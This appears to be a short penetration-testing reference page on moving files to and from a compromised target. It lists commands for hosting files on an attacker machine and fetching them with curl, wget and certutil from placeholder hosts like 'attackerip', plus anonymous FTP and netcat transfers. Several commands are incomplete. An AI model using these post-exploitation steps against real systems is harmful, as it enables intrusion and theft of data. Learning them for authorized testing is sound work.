File transfers

Once we gain initial access to our target we may need to upload additional tools to help us elevate privileges or provide easier methods of accessing the machine at a later point. We might also want to download files from the target for use in our report. The following list provides a few common techniques for executing file transfers.

Hosting files via HTTP

On our attacking machine we have two options for serving files. The first (preferred) method is to run the SimpleHTTPServer Python module in the directory that contains the files we want to transfer.

python3 -m http.server 80
python -m SimpleHTTPServer 80

Our second option is to use our built in Apache server. To do this we need start the Apache 2 service. Once started our files will be served from var/www/html.

systemctl start Apache2 

Next, we use our target machine to request the desired filed from the server. The method varies slightly depending on the OS of the target machine.

Built-in OS functions


wget -O report_wget.pdf
    -O saves the file with a different name on the local machine
curl -o file.pdf http://attackerip/file.pdf
axel -a -n 20 -o report_axel.pdf
    -n --used to specify the number of connections
    -a --provides a more concise progress indicator
    -o --used to specify a different name for the downloaded file


certutil -urlcache -f http://sourceip/file.exe [c:\desired_destination\desired_]name.exe

Other alternatives


Create an FTP server in the directory you are in, on port 21, allow anonymous access:

Python -m pyftpdlib 21
ftp $IPaddressofattacker


On receiving machine: nc -nlvp 4444 > incoming.exe

On sending machine: nc – nv 4444 < file.exe

Last updated